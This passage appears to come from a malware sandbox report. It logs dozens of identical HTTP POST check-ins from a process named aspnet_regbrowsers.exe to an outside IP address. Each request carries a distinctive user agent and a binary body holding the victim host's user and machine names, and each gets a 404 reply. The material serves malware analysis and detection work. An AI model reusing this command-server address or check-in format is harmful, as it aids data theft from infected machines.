                                                                                            Oct 25, 2024 19:52:02.484688044 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.224918694.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:02.919217110 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:02.924654961 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:03.890964985 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.224918794.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:04.037992001 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:04.043801069 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:05.006691933 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.224918894.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:05.177855015 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:05.183331013 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:06.184935093 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.224918994.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:06.345585108 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:06.351135969 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:07.663984060 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.224919094.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:07.818367958 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:07.823914051 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:08.793823004 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.224919194.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:08.968086958 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:08.973694086 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:10.024930954 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.224919294.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:10.373667002 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:10.380036116 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:11.347244024 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.224919394.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:12.493413925 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:12.508411884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:13.456581116 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.224919494.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:13.967932940 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:13.973613024 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:14.950884104 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.224919594.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:15.119479895 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:15.125319004 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:16.081203938 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.224919694.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:16.236784935 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:16.242299080 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:17.296941042 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.224919794.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:17.446836948 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:17.452451944 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:18.438119888 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            28192.168.2.224919894.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:18.583517075 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:18.588953018 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:19.554600954 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:19 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            29192.168.2.224919994.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:19.690922976 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:19.696573019 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:20.718924046 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            30192.168.2.224920094.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:20.859158039 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:20.864617109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:21.835601091 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            31192.168.2.224920194.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:21.991240025 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:21.996702909 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:22.952907085 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            32192.168.2.224920294.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:23.137924910 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:23.143979073 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:24.369417906 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


